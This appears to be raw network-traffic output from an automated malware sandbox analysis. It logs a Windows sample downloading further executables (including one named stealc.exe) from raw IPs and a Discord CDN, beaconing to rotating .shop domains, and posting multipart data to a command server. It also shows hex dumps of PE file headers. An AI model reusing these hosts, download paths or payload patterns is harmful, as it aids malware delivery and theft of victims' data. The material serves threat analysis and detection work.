00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 10 Aug 2024 14:12:27 GMTContent-Type: application/octet-streamContent-Length: 3097600Last-Modified: Tue, 06 Aug 2024 15:59:21 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66b24859-2f4400"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 0c 00 00 00 00 00 00 fc 2b 00 83 13 00 00 e0 00 03 03 0b 01 03 00 00 be 1b 00 00 36 01 00 00 00 00 00 40 b2 04 00 00 10 00 00 00 d0 1b 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 f0 30 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 90 2d 00 72 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 1b 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 2d bd 1b 00 00 10 00 00 00 be 1b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 64 61 74 61 00 00 00 c8 6a 02 00 00 d0 1b 00 00 36 01 00 00 c2 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2f 34 00 00 00 00 00 00 b5 01 00 00 00 40 1e 00 00 02 00 00 00 f8 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 2f 31 38 00 00 00 00 00 1d d6 01 00 00 50 1e 00 00 d8 01 00 00 fa 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 2f 33 30 00 00 00 00 00 d0 80 01 00 00 30 20 00 00 82 01 00 00 d2 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 2f 34 33 00 00 00 00 00 fc dc 00 00 00 c0 21 00 00 de 00 00 00 54 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 2f 35 39 00 00 00 00 00 24 32 01 00 00 a0 22 00 00 34 01 00 00 32 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 2f 37 35 00 00 00 00 00 37 00 00 00 00 e0 23 00 00 02 00 00 00 66 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 2f 39 34 00 00 00 00 00 51 2c 09 00 00 f0 23 00 00 2e 09 00 00 68 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 2f 31 30 36 00 00 00 00 d8 61 00 00 00 20 2d 00 00 62 00 00 00 96 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 2e 69 64 61 74 61 00 00 72 03 00 00 00 90 2d 00 00 04 00 00 00 f8 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 73 79 6d 74 61 62 00 be 46 03 00 00 a0 2d 00 00 48 03 00 00 fc 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 10 Aug 2024 14:12:30 GMTContent-Type: application/octet-streamContent-Length: 11649536Last-Modified: Fri, 09 Aug 2024 08:56:51 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66b5d9d3-b1c200"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 6c c5 b5 66 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 88 af 00 00 36 02 00 00 00 00 00 ce a6 af 00 00 20 00 00 00 c0 af 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 b2 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 a6 af 00 4b 00 00 00 00 e0 af 00 f4 2e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 b2 00 0c 00 00 00 3c a6 af 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 86 af 00 00 20 00 00 00 88 af 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 80 02 00 00 00 c0 af 00 00 04 00 00 00 8c af 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 2e 02 00 00 e0 af 00 00 30 02 00 00 90 af 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 b2 00 00 02 00 00 00 c0 b1 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 10 Aug 2024 14:12:30 GMTContent-Type: application/octet-streamContent-Length: 6332416Last-Modified: Fri, 09 Aug 2024 06:29:37 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66b5b751-60a000"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 3e a7 b5 66 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 bc 5e 00 00 e0 01 00 00 00 00 00 6e da 5e 00 00 20 00 00 00 e0 5e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 61 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 20 da 5e 00 4b 00 00 00 00 00 5f 00 bc d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 60 00 0c 00 00 00 d4 d9 5e 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 ba 5e 00 00 20 00 00 00 bc 5e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 80 02 00 00 00 e0 5e 00 00 04 00 00 00 c0 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 bc d8 01 00 00 00 5f 00 00 da 01 00 00 c4 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 60 00 00 02 00 00 00 9e 60 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /profiles/76561199751190313 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 147.45.47.59Connection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 147.45.44.104 147.45.44.104
Source: Joe Sandbox View	IP Address: 87.240.132.78 87.240.132.78
Source: Joe Sandbox View	IP Address: 87.240.132.78 87.240.132.78

Source: Joe Sandbox View

ASN Name: RAINBOW-HKRainbownetworklimitedHK RAINBOW-HKRainbownetworklimitedHK

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

DNS query: name: ipinfo.io

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: api.myip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: HEAD /attachments/1114587923828985909/1271828116100222987/setup.exe?ex=66b8c1bc&is=66b7703c&hm=3ffe5bb23d054819ae2313e718a0ec64e2ade31a9965e8b041f7e231be3fcbde& HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Cache-Control: no-cacheHost: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /temp/random.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: helleaa.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /attachments/1114587923828985909/1271828116100222987/setup.exe?ex=66b8c1bc&is=66b7703c&hm=3ffe5bb23d054819ae2313e718a0ec64e2ade31a9965e8b041f7e231be3fcbde& HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Cache-Control: no-cacheHost: cdn.discordapp.comConnection: Keep-AliveCookie: __cf_bm=TQkFGfEYadGUE57Kfip1wvX0OHkU_Ir9uw4pAsm89UU-1723299142-1.0.1.1-EMUSdkltkyg45WsAAuxNg9RrPCV2qvYpSr1oeNLMcDnmI4_1mvkyehqC3u6IicirJoNCt26JZkx8xXFXqNvbzw; _cfuvid=kuQ1QPcubEVwRLbFnIoZ7sfufmJbnwwA_AHPO2yuLiM-1723299142296-0.0.1.1-604800000
Source: global traffic	HTTP traffic detected: GET /doc869877400_679230593?hash=JDs0Rq6RGgLMWXUFzWMB8cYHTybh6lXFwxmcZ1ZeK2w&dl=uMxA8hZLVNzU3FtB3MumkHq06odvtZCiVngKoCNbdNz&api=1&no_preview=1#launc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1cN8u7 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: yip.su
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: enfixxysdjsip.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: celebratioopz.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: deallerospfosu.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: bassizcellskz.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mennyudosirso.shop
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 78.46.239.218Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: languagedscie.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAEBFHJJDAAKFIECGDBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 78.46.239.218Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: complaintsipzzx.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIEHIIIJDAAAAAAKECBFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 78.46.239.218Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: quialitsuzoxm.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IECBAFCAAKJDHJKFIEBGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 78.46.239.218Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAAAFBKFIECAAKECGCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 78.46.239.218Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: tenntysjuxmz.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAFHCGIJECFHIDGDBKEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 78.46.239.218Content-Length: 6509Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBFIIIEHCFHJKFHDHDAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 78.46.239.218Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKKEGDGCGDAKEBFIJECUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 78.46.239.218Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHDAFIIDAKJDGDHIDAKJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 78.46.239.218Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIIDAEBGCAAECAKFHIIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 78.46.239.218Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIIEGIDHCBFIDHJDGDBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 78.46.239.218Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAEBAFBGIDHCBFHIECFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 78.46.239.218Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJEGDAKEHJECAKEGDHJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 78.46.239.218Content-Length: 457Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCAECGIEBKJKEBGDHDAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 78.46.239.218Content-Length: 131881Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKKJEBFIDAEBFHIDAEBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 78.46.239.218Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCAFHCAKFBFIECAFIIJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 78.46.239.218Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /api/crazyfish.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.47.169
Source: global traffic	HTTP traffic detected: GET /api/crazyfish.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 185.225.200.214
Source: global traffic	HTTP traffic detected: POST /api/twofish.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Content-Length: 133Host: 185.225.200.214
Source: global traffic	HTTP traffic detected: HEAD /prog/66b623c3b1dcb_Mowdiewart.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /prog/66ae9cc050ded_file0308.exe#fileotr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /inc/armadegon.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /d/525403 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 194.58.114.223Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /prog/66b45c742e0a1_123p.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /prog/66b5ac1092454_otraba.exe#otr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /inc/armadegon.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /prog/66b24859611ad_agent_3.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /prog/66b5d9d3adbaa_defaultr.exe#space HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: HEAD /prog/66b5b75106ac6_stealc.exe#space HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
